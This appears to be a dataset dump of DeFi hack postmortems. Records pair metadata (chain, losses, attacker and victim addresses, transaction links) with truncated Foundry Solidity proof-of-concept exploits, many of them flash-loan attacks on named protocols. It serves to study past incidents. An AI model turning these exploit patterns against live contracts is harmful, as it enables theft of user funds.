2026-01-07T10:59:16.535751
postmortems
bsc
23,241,440
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { USDT.approve(address(Router), type(uint256).max); SDAO.approve(address(Router), type(uint256).max); Pair.approve(address(Router), type(uint256).max); Pair.approve(address(SDAO), type(uint256).max); SDAO.approve(address(this), type(uint256).max); ...
true
Unknown
5.03
medium
SDAO Exploit (2022-11)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BeosinAlert/status/1589501207181393920 // https://twitter.com/CertiKAlert/status/1589428153591615488 // TX // https://bscscan.com/tx/0x03d363462519029cf9a544d440...
exploit_poc
MooCAKECTX
2022-11
MooCAKECTX_exp.sol
flash_loan
967f9fbbd69d4b99
2026-01-07T10:59:16.535812
postmortems
bsc
22,832,427
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { address(WBNB).call{value: 3 ether}(""); WBNBToCTK(); CTK.transfer(address(SmartChef), CTK.balanceOf(address(this))); DVM(dodo).flashLoan(0, 400_000 * 1e18, address(this), new bytes(1)); emit log_named_decimal_uint("[End] Attacker CAKE balance afte...
true
Unknown
5
medium
MooCAKECTX Exploit (2022-11)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; interface Blacksmith { function claimRewardsForPools( address[] calldata _lpTokens ) external; function claimRewards( address _lpToken ) external; function dep...
exploit_poc
Cover
2020-12
Cover_exp.sol
null
d7498517d839053f
2026-01-07T10:59:16.535873
postmortems
unknown
11,542,309
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function test() public { cheat.prank(0x00007569643bc1709561ec2E86F385Df3759e5DD); bs.deposit(address(bpt), 15_255_552_810_089_260_015_361); emit log_named_uint("Deposit BPT", 15_255_552_810_089_260_015_361); cheat.prank(0x00007569643bc1709561ec2E86F385Df3759e5DD); //bs.withdraw(a...
true
Unknown
2.73
low
Cover Exploit (2020-12)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; // @KeyInfo - Total Lost : 155 $ETH // Attacker : https://etherscan.io/address/0xcf267eA3f1ebae3C29feA0A3253F94F3122C2199 // Attack Contract : https://etherscan.io/address/0xc5918a927C4FB83FE99E30d6F66707F4b396900E // Vulnerable...
exploit_poc
SpankChain
2018-10
SpankChain_exp.sol
flash_loan
e6e79f1d9dbbbc99
2026-01-07T10:59:16.535912
postmortems
ethereum
null
155 $ETH
155
https://etherscan.io/address/0xcf267eA3f1ebae3C29feA0A3253F94F3122C2199
https://etherscan.io/address/0xc5918a927C4FB83FE99E30d6F66707F4b396900E
https://etherscan.io/address/0xf91546835f756DA0c10cFa0CDA95b15577b84aA7
https://etherscan.io/tx/0x21e9d20b57f6ae60dac23466c8395d47f42dc24628e5a31f224567a2b4effa88
null
null
true
true
true
low
155 $ETH
flash-loan
function testExploit() public balanceLog { //implement exploit code here vm.deal(address(this), 5 ether); //simulation flashloan SpankChainExploitHelper h = new SpankChainExploitHelper(); h.exploit{value: 5 ether}(32); payable(address(0x0)).transfer(5 ether); //simulation replay ...
true
155 $ETH
https://etherscan.io/address/0xcf267eA3f1ebae3C29feA0A3253F94F3122C2199
https://etherscan.io/address/0xc5918a927C4FB83FE99E30d6F66707F4b396900E
https://etherscan.io/address/0xf91546835f756DA0c10cFa0CDA95b15577b84aA7
https://etherscan.io/tx/0x21e9d20b57f6ae60dac23466c8395d47f42dc24628e5a31f224567a2b4effa88
$155
8.63
high
SpankChain Exploit (2018-10)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~17 ETH // TX : https://app.blocksec.com/explorer/tx/eth/0xbf5b2d22fa88965ddfc6e6d685fc7cfc683340c49e126386759ed9e4027b1415 // Attacker : https://etherscan.io/address/...
exploit_poc
RBalancer
2023-11
RBalancer_exp.sol
null
7869e9018e8c406b
2026-01-07T10:59:16.535961
postmortems
ethereum
18,523,440
~17 ETH
17
https://etherscan.io/address/0x9abe851bcc4fd1986c3d1ef8978fad86a26a0c57
https://etherscan.io/address/0x9c52c485edd3d22847a1614b8988fbf520b33047
null
null
null
null
true
false
false
low
~17 ETH
unknown
function testExpolit() public { emit log_named_decimal_uint( "attacker WETH balance before attack", WETH.balanceOf(address(this)), WETH.decimals() ); emit log_named_decimal_uint("attacker balance before attack", address(this).balance, 18); attack(); emit log_named_d...
true
https://etherscan.io/address/0x9abe851bcc4fd1986c3d1ef8978fad86a26a0c57
https://etherscan.io/address/0x9c52c485edd3d22847a1614b8988fbf520b33047
$17
4.97
low
RBalancer Exploit (2023-11)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$53K // Attacker : https://basescan.org/address/0x5aa27d556f898846b9bad32f0cdba5b1f8bc3144 // Attack Contract : https://basescan.org/address/0xc4566ae957ad8dde4768bdd28c...
exploit_poc
CAROLProtocol
2023-11
CAROLProtocol_exp.sol
flash_loan
384951104f58aa96
2026-01-07T10:59:16.536007
postmortems
base
null
~$53K
53,000
https://basescan.org/address/0x5aa27d556f898846b9bad32f0cdba5b1f8bc3144
https://basescan.org/address/0xc4566ae957ad8dde4768bdd28cdc3695e4780b2c
https://basescan.org/address/0x26fe408bbd7a490feb056da8e2d1e007938e5685
https://app.blocksec.com/explorer/tx/base/0xd962d397a7f8b3aadce1622e705b9e33b430e86e0d306d6fb8ccbc5957b4185c
null
https://x.com/MetaSec_xyz/status/1730496513359647167
true
true
true
medium
~$53K
flash-loan
function testExploit() public { // Prepare tx: // Start with following ETH balance deal(address(this), 0.07 ether); emit log_named_decimal_uint("Exploiter ETH balance before attack", address(this).balance, 18); // Buy CAROL tokens with ETH through bonding. Create active 'Bond' ...
true
~$53K
https://basescan.org/address/0x5aa27d556f898846b9bad32f0cdba5b1f8bc3144
https://basescan.org/address/0xc4566ae957ad8dde4768bdd28cdc3695e4780b2c
https://basescan.org/address/0x26fe408bbd7a490feb056da8e2d1e007938e5685
https://app.blocksec.com/explorer/tx/base/0xd962d397a7f8b3aadce1622e705b9e33b430e86e0d306d6fb8ccbc5957b4185c
https://x.com/MetaSec_xyz/status/1730496513359647167
$53.0K
10
high
CAROLProtocol Exploit (2023-11)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "./../basetest.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$4K // Attacker : https://etherscan.io/address/0x0c06340f5024c114fe196fcb38e42d20ab00f6eb // Attack Contract : https://etherscan.io/address/0x80a6419cb8e7d1ef1af074368f7...
exploit_poc
MetaLend
2023-11
MetaLend_exp.sol
flash_loan
211290d39105b2fb
2026-01-07T10:59:16.536078
postmortems
ethereum
null
~$4K
4,000
https://etherscan.io/address/0x0c06340f5024c114fe196fcb38e42d20ab00f6eb
https://etherscan.io/address/0x80a6419cb8e7d1ef1af074368f7eace1ae2358ca
https://etherscan.io/address/0x5578f2e245e932a599c46215a0ca88707230f17b
https://app.blocksec.com/explorer/tx/eth/0x4c684fb2618c29743531dec9253ede1b757bda0b323dc2f305e3b50ab1773da7
null
https://x.com/MetaSec_xyz/status/1728424965257691173
true
true
true
low
~$4K
flash-loan
function testExploit() public { deal(address(this), 0); emit log_named_decimal_uint("Exploiter WETH balance before attack", WETH.balanceOf(address(this)), 18); Spark.flashLoanSimple(address(this), address(WETH), 100e18, bytes(""), 0); emit log_named_decimal_uint("Exploiter WETH balance...
true
~$4K
https://etherscan.io/address/0x0c06340f5024c114fe196fcb38e42d20ab00f6eb
https://etherscan.io/address/0x80a6419cb8e7d1ef1af074368f7eace1ae2358ca
https://etherscan.io/address/0x5578f2e245e932a599c46215a0ca88707230f17b
https://app.blocksec.com/explorer/tx/eth/0x4c684fb2618c29743531dec9253ede1b757bda0b323dc2f305e3b50ab1773da7
https://x.com/MetaSec_xyz/status/1728424965257691173
$4.0K
9.2
high
MetaLend Exploit (2023-11)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import {Test, console2} from "forge-std/Test.sol"; import "../interface.sol"; // @Analysis // https://lunaray.medium.com/okc-project-hack-analysis-0907312f519b // @TX // https://dashboard.tenderly.co/tx/bnb/0xd85c603f71bb84437bc69b21d785f982f763035557356...
exploit_poc
OKC
2023-11
OKC_exp.sol
flash_loan
ba210083ffb8b69d
2026-01-07T10:59:16.536141
postmortems
unknown
33,464,598
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { // 0.000000000000000001 attack_contract.expect1{value: 1 ether}(); } } contract AttackContract is IDODOCallee { uint256 public nonce = 1; AttackContract2 public attack_contract1; AttackContract2 public attack_contract2; IERC20 public USDT = IERC20(0x...
true
Unknown
6
medium
OKC Exploit (2023-11)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~$61k // Frontrunner: https://bscscan.com/address/0x7cb74265e3e2d2b707122bf45aea66137c6c8891 // Original Attacker: https://bscscan.com/address/0x84f37F6cC75cCde5fE9bA99...
exploit_poc
AIS
2023-11
AIS_exp.sol
null
8cc219aa1319da20
2026-01-07T10:59:16.536241
postmortems
bsc
33,916,687
~$61k
61,000
https://bscscan.com/address/0x84f37F6cC75cCde5fE9bA99093824A11CfDc329D
https://bscscan.com/address/0xf6f60b0e83d9837c1f247c575c8583b1d085d351
null
https://bscscan.com/tx/0x0be817b6a522a111e06293435c233dab6576d7437d0e148b45efcf7ab8a10de0
null
null
true
true
false
medium
~$61k
unknown
function testExploit() public { uint256 balanceBefore = usdt.balanceOf(address(this)); usdt.approve(address(router), type(uint256).max); AIS.approve(address(router), type(uint256).max); pool.flash(address(this), 3_000_000 ether, 0, new bytes(1)); uint256 balanceAfter = usdt.bal...
true
https://bscscan.com/address/0x84f37F6cC75cCde5fE9bA99093824A11CfDc329D
https://bscscan.com/address/0xf6f60b0e83d9837c1f247c575c8583b1d085d351
https://bscscan.com/tx/0x0be817b6a522a111e06293435c233dab6576d7437d0e148b45efcf7ab8a10de0
$61.0K
6.89
medium
AIS Exploit (2023-11)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; // @KeyInfo - Total Lost : ~$30K // Attacker : https://bscscan.com/address/0xdf6b0200b4e1bc4a310f33df95a9087cc2c79038 // Attack Contract : https://bscscan.com/address/0x721a66c7767103e7dcacf8440e8dd074edff40a8 // Vulnerable C...
exploit_poc
LinkDao
2023-11
LinkDao_exp.sol
null
381d1d837329914e
2026-01-07T10:59:16.536291
postmortems
bsc
33,527,744
~$30K
30,000
https://bscscan.com/address/0xdf6b0200b4e1bc4a310f33df95a9087cc2c79038
https://bscscan.com/address/0x721a66c7767103e7dcacf8440e8dd074edff40a8
https://bscscan.com/address/0x6524a5fd3fec179db3b3c1d21f700da7abe6b0de
https://explorer.phalcon.xyz/tx/bsc/0x4ed59e3013215c272536775a966f4365112997a6eec534d38325be014f2e15ee
null
https://x.com/phalcon_xyz/status/1725058908144746992
true
true
false
medium
~$30K
unknown
function test() public { // vm.prank(0xdF6B0200B4e1Bc4a310F33DF95a9087cC2C79038, 0xdF6B0200B4e1Bc4a310F33DF95a9087cC2C79038); x2effb772(); }
true
~$30K
https://bscscan.com/address/0xdf6b0200b4e1bc4a310f33df95a9087cc2c79038
https://bscscan.com/address/0x721a66c7767103e7dcacf8440e8dd074edff40a8
https://bscscan.com/address/0x6524a5fd3fec179db3b3c1d21f700da7abe6b0de
https://explorer.phalcon.xyz/tx/bsc/0x4ed59e3013215c272536775a966f4365112997a6eec534d38325be014f2e15ee
https://x.com/phalcon_xyz/status/1725058908144746992
$30.0K
7.22
medium
LinkDao Exploit (2023-11)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; // @KeyInfo - Total Lost : ~5 $ETH // Attacker : https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 // Vulnerable Contract : https://bscscan.com/address/0x15b1ed79ca9d7955af3e169d7b323c4f1eeb5d12 // Attack Tx : https://bscscan.com/tx/0...
exploit_poc
KR
2023-11
KR_exp.sol
null
6090386e059b5b21
2026-01-07T10:59:16.536334
postmortems
bsc
33,267,985
~5 $ETH
5
https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
null
https://bscscan.com/address/0x15b1ed79ca9d7955af3e169d7b323c4f1eeb5d12
https://bscscan.com/tx/0x2abf871eb91d03bc8145bf2a415e79132a103ae9f2b5bbf18b8342ea9207ccd7
null
null
true
false
false
low
~5 $ETH
unknown
function testExploit() public { BUSD.transfer(address(0x000000000000000000000000000000000000dEaD), BUSD.balanceOf(address(this))); emit log_named_uint("Attacker BUSD balance before attack", BUSD.balanceOf(address(this))); tokenToSell = KR.balanceOf(address(0xAD1e7BF0A469b7B912D2B9d766d0C93291cA2...
true
~5 $ETH
https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
https://bscscan.com/address/0x15b1ed79ca9d7955af3e169d7b323c4f1eeb5d12
https://bscscan.com/tx/0x2abf871eb91d03bc8145bf2a415e79132a103ae9f2b5bbf18b8342ea9207ccd7
$5
6.76
medium
KR Exploit (2023-11)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "./../basetest.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$18K // Attacker : https://bscscan.com/address/0xf5f21746ff9351f16a42fa272d7707cc35760e4b // Attack Contract : https://bscscan.com/address/0x76c8a674e814f5bd806fe6dd9975...
exploit_poc
WECO
2023-11
WECO_exp.sol
null
9c614ce82872500a
2026-01-07T10:59:16.536379
postmortems
bsc
null
~$18K
18,000
https://bscscan.com/address/0xf5f21746ff9351f16a42fa272d7707cc35760e4b
https://bscscan.com/address/0x76c8a674e814f5bd806fe6dd9975446a76056c1a
https://bscscan.com/address/0xd672b766d66662f5c6fd798a999e1193a7945451
https://app.blocksec.com/explorer/tx/BSC/0x2040a481c933b50ee31aba257c2041c48bb7a0b4bf4b4fad1ac165f19c4269e8
null
https://x.com/MetaSec_xyz/status/1725311048625041887
true
true
false
medium
~$18K
unknown
function testExploit() public { // Initial WECOIN balance. There was a transfer of WECOIN tokens from exploiter to attack contract // https://app.blocksec.com/explorer/tx/bsc/0x6129e18fdba3b4d3f1e6c3c9c448cafcbee5b5c82e4bbb69a404360f0e579051 deal(address(WECOIN), address(this), 25_000_001 ether)...
true
~$18K
https://bscscan.com/address/0xf5f21746ff9351f16a42fa272d7707cc35760e4b
https://bscscan.com/address/0x76c8a674e814f5bd806fe6dd9975446a76056c1a
https://bscscan.com/address/0xd672b766d66662f5c6fd798a999e1193a7945451
https://app.blocksec.com/explorer/tx/BSC/0x2040a481c933b50ee31aba257c2041c48bb7a0b4bf4b4fad1ac165f19c4269e8
https://x.com/MetaSec_xyz/status/1725311048625041887
$18.0K
7.44
medium
WECO Exploit (2023-11)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "./../basetest.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : Unclear // Attacker : https://bscscan.com/address/0xfe2105e1317dfd6ed3887bf7882977c03cfebb7c // Attack Contract : https://bscscan.com/address/0x22ad9eef79615a1592e969bdf7...
exploit_poc
SwampFinance
2023-11
SwampFinance_exp.sol
flash_loan
03eeed95fb3d5837
2026-01-07T10:59:16.536426
postmortems
bsc
null
Unclear
null
https://bscscan.com/address/0xfe2105e1317dfd6ed3887bf7882977c03cfebb7c
https://bscscan.com/address/0x22ad9eef79615a1592e969bdf7b238a07281ab80
https://bscscan.com/address/0x33adbf5f1ec364a4ea3a5ca8f310b597b8afdee3
https://app.blocksec.com/explorer/tx/bsc/0x13e75878a21af9a9b2207f5d9e18f19a43083a9ffbac36df5a7d4d67a52c164f
null
https://x.com/MetaSec_xyz/status/1720373044517208261
true
true
true
medium
Unclear
flash-loan
function testExploit() public { deal(address(this), 0); // In the begining transfer tokens from exploiter to attack contract deal(address(WBNB), address(this), 1e15); deal(address(BUSDT), address(this), 155_049_710_721_328_089); deal(address(beltBNB), address(this), 1_272_113_372...
true
Unclear
https://bscscan.com/address/0xfe2105e1317dfd6ed3887bf7882977c03cfebb7c
https://bscscan.com/address/0x22ad9eef79615a1592e969bdf7b238a07281ab80
https://bscscan.com/address/0x33adbf5f1ec364a4ea3a5ca8f310b597b8afdee3
https://app.blocksec.com/explorer/tx/bsc/0x13e75878a21af9a9b2207f5d9e18f19a43083a9ffbac36df5a7d4d67a52c164f
https://x.com/MetaSec_xyz/status/1720373044517208261
Unknown
8.54
high
SwampFinance Exploit (2023-11)
false
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; // @KeyInfo - Total Lost : ~$52K // Attacker : https://bscscan.com/address/0xe9fac789c947f364f53c3bc28bb6e9e099526468 // Attack Contract : https://bscscan.com/address/0x87c75f8a69732bad999ce1fab464526856215c77 // Vulnerable C...
exploit_poc
Token8633_9419
2023-11
Token8633_9419_exp.sol
null
80f5ac265abc1a29
2026-01-07T10:59:16.536490
postmortems
bsc
33,545,074
~$52K
52,000
https://bscscan.com/address/0xe9fac789c947f364f53c3bc28bb6e9e099526468
https://bscscan.com/address/0x87c75f8a69732bad999ce1fab464526856215c77
https://bscscan.com/address/0x11cd2168fc420ae1375626655ab8f355f0075bd6
https://explorer.phalcon.xyz/tx/bsc/0xf6ec3c22b718c3da17746416992bac7b65a4ef42ccf5b43cf0716c82bffc2844
null
null
true
false
false
medium
~$52K
unknown
function test() public { // vm.prank(0xe9FAc789C947f364f53C3BC28bB6E9e099526468, 0xe9FAc789C947f364f53C3BC28bB6E9e099526468); xd8ea4b59(); }
true
~$52K
https://bscscan.com/address/0xe9fac789c947f364f53c3bc28bb6e9e099526468
https://bscscan.com/address/0x87c75f8a69732bad999ce1fab464526856215c77
https://bscscan.com/address/0x11cd2168fc420ae1375626655ab8f355f0075bd6
https://explorer.phalcon.xyz/tx/bsc/0xf6ec3c22b718c3da17746416992bac7b65a4ef42ccf5b43cf0716c82bffc2844
$52.0K
8.83
high
Token8633_9419 Exploit (2023-11)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; // @KeyInfo - Total Lost : ~$22.8K // Attacker : https://bscscan.com/address/0xb06d402705ad5156b42e4279903cbd7771cf59c9 // Attack Contract : https://bscscan.com/address/0x9a16b5375e79e409a8bfdb17cfe568e533c2d7c5 // Vulnerable Co...
exploit_poc
EEE
2023-11
EEE_exp.sol
null
054c2f46a690ac92
2026-01-07T10:59:16.536550
postmortems
bsc
33,940,984
~$22.8K
22,800
https://bscscan.com/address/0xb06d402705ad5156b42e4279903cbd7771cf59c9
https://bscscan.com/address/0x9a16b5375e79e409a8bfdb17cfe568e533c2d7c5
https://bscscan.com/address/0x0506e571aba3dd4c9d71bed479a4e6d40d95c833
https://bscscan.com/tx/0x7312d9f9c13fc69f00f58e92a112a3e7f036ced7e65f7e0fa67382488d5557dc
null
null
true
true
false
medium
~$22.8K
unknown
false
~$22.8K
https://bscscan.com/address/0xb06d402705ad5156b42e4279903cbd7771cf59c9
https://bscscan.com/address/0x9a16b5375e79e409a8bfdb17cfe568e533c2d7c5
https://bscscan.com/address/0x0506e571aba3dd4c9d71bed479a4e6d40d95c833
https://bscscan.com/tx/0x7312d9f9c13fc69f00f58e92a112a3e7f036ced7e65f7e0fa67382488d5557dc
$22.8K
5.78
medium
EEE Exploit (2023-11)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "./../basetest.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$3K // Attacker : https://etherscan.io/address/0x9d44f1a37044500064111010632a8a59003701c8 // Attack Contract : https://etherscan.io/address/0x4bc691601b50b3e107b89d5ea17...
exploit_poc
Burntbubba
2023-11
Burntbubba_exp.sol
flash_loan
7544910fd97b8cd7
2026-01-07T10:59:16.536601
postmortems
ethereum
null
~$3K
3,000
https://etherscan.io/address/0x9d44f1a37044500064111010632a8a59003701c8
https://etherscan.io/address/0x4bc691601b50b3e107b89d5ea172b40a9dbc6251
https://etherscan.io/address/0xa44e79a2c9a8965e7a6fa77bf0ca8faf50e6c73e
https://app.blocksec.com/explorer/tx/eth/0x2b6d0af0dc513a15e325703405739057f9de6ef3f99934b957653b8a3fade4c6
null
https://x.com/MetaSec_xyz/status/1730044259087315046
true
true
true
low
~$3K
flash-loan
function testExploit() public { // Attacking contract start AST amount deal(address(AST), address(this), 2_062_557); emit log_named_decimal_uint("Exploiter USDC balance before attack", USDC.balanceOf(address(this)), 6); emit log_named_decimal_uint("Exploiter WETH balance before attack", ...
true
~$3K
https://etherscan.io/address/0x9d44f1a37044500064111010632a8a59003701c8
https://etherscan.io/address/0x4bc691601b50b3e107b89d5ea172b40a9dbc6251
https://etherscan.io/address/0xa44e79a2c9a8965e7a6fa77bf0ca8faf50e6c73e
https://app.blocksec.com/explorer/tx/eth/0x2b6d0af0dc513a15e325703405739057f9de6ef3f99934b957653b8a3fade4c6
https://x.com/MetaSec_xyz/status/1730044259087315046
$3.0K
10
high
Burntbubba Exploit (2023-11)
true
true
true
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~23 WBNB // TX : https://app.blocksec.com/explorer/tx/bsc/0x19ef4febcd272643642925d5d7e9ab8fd3ed8785c5e3268f5b6fee44ae6b4a34 // Attacker : https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc5...
exploit_poc
BRAND
2023-11
BRAND_exp.sol
flash_loan
42c4e9a946953062
2026-01-07T10:59:16.536660
postmortems
bsc
33,139,124
~23 WBNB
23
https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
https://bscscan.com/address/0xf994f331409327425098feecfc15db7fabf782b7
null
null
null
null
true
false
true
low
~23 WBNB
flash-loan
false
https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
https://bscscan.com/address/0xf994f331409327425098feecfc15db7fabf782b7
$23
4.17
low
BRAND Exploit (2023-11)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$150K // Attacker : https://etherscan.io/address/0x4e087743e8025012c4704a1953c87eeff1e6ef48 // Attack Contract : https://etherscan.io/address/0x3763b7f83358171b1660ee20...
exploit_poc
MEV_0xa247
2023-11
MEV_0xa247_exp.sol
null
475340b8b438b86d
2026-01-07T10:59:16.536723
postmortems
ethereum
18,552,866
~$150K
150,000
https://etherscan.io/address/0x4e087743e8025012c4704a1953c87eeff1e6ef48
https://etherscan.io/address/0x3763b7f83358171b1660ee209f327954cc463129
null
https://explorer.phalcon.xyz/tx/eth/0x53eeab4447db331dbb47f93fd58a95d6faa230d559acde0687f8b5f5829e7a45
null
null
true
true
false
high
~$150K
unknown
function testExploit() public { deal(address(this), 0 ether); approveAll(); address[] memory tokens = new address[](24); tokens[0] = address(RAIL); tokens[1] = address(BBANK); tokens[2] = address(USDT); tokens[3] = address(BUMP); tokens[4] = address(0); ...
true
~$150K
https://etherscan.io/address/0x4e087743e8025012c4704a1953c87eeff1e6ef48
https://etherscan.io/address/0x3763b7f83358171b1660ee209f327954cc463129
https://explorer.phalcon.xyz/tx/eth/0x53eeab4447db331dbb47f93fd58a95d6faa230d559acde0687f8b5f5829e7a45
$150.0K
8
high
MEV_0xa247 Exploit (2023-11)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$290K // Attacker : https://arbiscan.io/address/0x09ed480feaf4cbc363481717e04e2c394ab326b4 // Attack Contract : https://arbiscan.io/address/0xb589d4a36ef8766d44c9785131...
exploit_poc
TheStandard_io
2023-11
TheStandard_io_exp.sol
null
06a9d870ae36a45a
2026-01-07T10:59:16.536808
postmortems
arbitrum
147,817,765
~$290K
290,000
https://arbiscan.io/address/0x09ed480feaf4cbc363481717e04e2c394ab326b4
https://arbiscan.io/address/0xb589d4a36ef8766d44c9785131413a049d51dbc0
null
https://explorer.phalcon.xyz/tx/arbitrum/0x51293c1155a1d33d8fc9389721362044c3a67e0ac732b3a6ec7661d47b03df9f
null
null
true
true
false
high
~$290K
unknown
function testExploit() public { // Attacker sent PAXG amount to exploit contract before attack deal(address(PAXG), address(this), 100e9); emit log_named_decimal_uint("Attacker USDC balance before exploit", USDC.balanceOf(address(this)), 6); emit log_named_decimal_uint("Attacker EURO ba...
true
~$290K
https://arbiscan.io/address/0x09ed480feaf4cbc363481717e04e2c394ab326b4
https://arbiscan.io/address/0xb589d4a36ef8766d44c9785131413a049d51dbc0
https://explorer.phalcon.xyz/tx/arbitrum/0x51293c1155a1d33d8fc9389721362044c3a67e0ac732b3a6ec7661d47b03df9f
$290.0K
8
high
TheStandard_io Exploit (2023-11)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // TX::https://app.blocksec.com/explorer/tx/bsc/0x7260ad0e4769ae68f0a680356c63140353c18d7be1b86a8c4e99a0fc3b6842c1 // GUY : https://x.com/MetaSec_xyz/status/1729323254610002277 // Profit : ~59 USD...
exploit_poc
FiberRouter
2023-11
FiberRouter_exp.sol
null
ecb1bb6964e50558
2026-01-07T10:59:16.536880
postmortems
unknown
33,874,498
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function attack() public { emit log_named_decimal_uint("[Begin] Attacker USDT before exploit", usdc.balanceOf(address(victim)), 18); uint256 victim_balance = usdc.balanceOf(address(victim)); wbnb.approve(address(pancakeRouter), 99_999 ether); address[] memory swapPath = new address[](2);...
true
Unknown
3.47
low
FiberRouter Exploit (2023-11)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.20; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~31,354 USD$ // Attacker : https://bscscan.com/tx/0xb29f18b89e56cc0151c7c17de0625a21018d8ae7 // Attack Contract : https://bscscan.com/address/0x783fbea45b32eaaa596b4441...
exploit_poc
3913
2023-11
3913_exp.sol
flash_loan
fa737e928f3a2a05
2026-01-07T10:59:16.536927
postmortems
bsc
33,132,467
~31,354 USD$
31
https://bscscan.com/tx/0xb29f18b89e56cc0151c7c17de0625a21018d8ae7
https://bscscan.com/address/0x783fbea45b32eaaa596b44412041dd1208025e83
null
null
null
null
true
true
true
low
~31,354 USD$
flash-loan
function testExploit() public { deal(address(busd), address(this), 0); emit log_named_decimal_uint( "attacker balance busd before attack:", busd.balanceOf(address(this)), busd.decimals() ); dodo1FlashLoanAmount = busd.balanceOf(dodo1); IDodo(dodo1).flashLoan(0, dodo1F...
true
https://bscscan.com/tx/0xb29f18b89e56cc0151c7c17de0625a21018d8ae7
https://bscscan.com/address/0x783fbea45b32eaaa596b44412041dd1208025e83
$31
8
high
3913 Exploit (2023-11)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "./../basetest.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : Unclear // Attacker : https://bscscan.com/address/0xddaaedcf226729def824cc5c14382c5980844d1f // Attack Contract : https://bscscan.com/address/0x9d0d28f7b9a9e6d55abb9e41a8...
exploit_poc
EHX
2023-11
EHX_exp.sol
flash_loan
b401518df388d8fa
2026-01-07T10:59:16.536987
postmortems
bsc
null
Unclear
null
https://bscscan.com/address/0xddaaedcf226729def824cc5c14382c5980844d1f
https://bscscan.com/address/0x9d0d28f7b9a9e6d55abb9e41a87df133f316c68c
https://bscscan.com/address/0xe1747a23c44f445062078e3c528c9f4c28c50a51
https://app.blocksec.com/explorer/tx/bsc/0x8b528372b743b4b8c4eb0904c96529482653187c19e13afaa22f3ba4e08fbfbb
null
https://x.com/MetaSec_xyz/status/1724691996638618086
true
true
true
medium
Unclear
flash-loan
function testExploit() public { emit log_named_decimal_uint( "Exploiter WBNB balance before attack", WBNB.balanceOf(address(this)), WBNB.decimals() ); DPPOracle.flashLoan(flashAmountWBNB, 0, address(this), bytes("_")); emit log_named_decimal_uint( "Exploiter WBN...
true
Unclear
https://bscscan.com/address/0xddaaedcf226729def824cc5c14382c5980844d1f
https://bscscan.com/address/0x9d0d28f7b9a9e6d55abb9e41a87df133f316c68c
https://bscscan.com/address/0xe1747a23c44f445062078e3c528c9f4c28c50a51
https://app.blocksec.com/explorer/tx/bsc/0x8b528372b743b4b8c4eb0904c96529482653187c19e13afaa22f3ba4e08fbfbb
https://x.com/MetaSec_xyz/status/1724691996638618086
Unknown
7.77
medium
EHX Exploit (2023-11)
false
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$155K // Attacker : https://bscscan.com/address/0x1a7b15354e2f6564fcf6960c79542de251ce0dc9 // Attack Contract : https://bscscan.com/address/0x1694d7fabf3b28f11d65deeb9f...
exploit_poc
TrustPad
2023-11
TrustPad_exp.sol
null
9fa3070198aa12d9
2026-01-07T10:59:16.537051
postmortems
bsc
33,260,104
~$155K
155,000
